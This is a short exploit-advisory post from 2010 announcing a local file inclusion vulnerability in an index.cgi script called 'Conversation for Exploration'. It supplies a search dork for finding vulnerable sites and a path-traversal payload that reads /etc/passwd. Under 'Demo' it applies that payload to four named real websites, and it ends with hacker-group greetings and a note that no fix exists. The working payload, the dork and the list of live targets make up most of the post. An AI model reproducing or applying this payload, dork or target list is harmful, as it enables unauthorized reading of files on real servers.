Conversation for Exploration (Index.cgi) Local File Inclusion Vulnerability

2010-10-04 12:16:34
Posted by: Net.Edit0r

=============================================
Conversation for Exploration (Index.cgi) Local File Inclusion Vulnerability
=============================================

###########################

Author: Net.Edit0r

Email : [email protected] & [email protected]

Script: Script Home [ www.lauralee.com ]

Dork : "Conversation for Exploration with LAURA LEE"

Platform :linux/cgi

###########################

[ Vulnerable File ]

1. [ index.cgi?page=../../../../../../../../../../etc/passwd ]

[ XpL ]

http://Target/[path]/index.cgi?page=../../../../../../../../../../etc/passwd


[ Demo]

http://www.shamanicvision.com/index.cgi?page=../../../../../../../../../../etc/passwd

http://www.talkstudio.com/index.cgi?page=../../../../../../../../../../etc/passwd

http://www.globalelders.com/index.cgi?page=../../../../../../../../../../etc/passwd

http://www.arch.waseda.ac.jp/index.cgi?page=../../../../../../../../../../etc/passwd

########################################### Iranian HackerZ ##############################################
#
#
# Thanks To: Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic ~ AmIr-MaGic ~ Skitt3r ~ J3nN3.B4m4r4M
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net ~ PHC.Ir #Ibh
#
##########################################################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.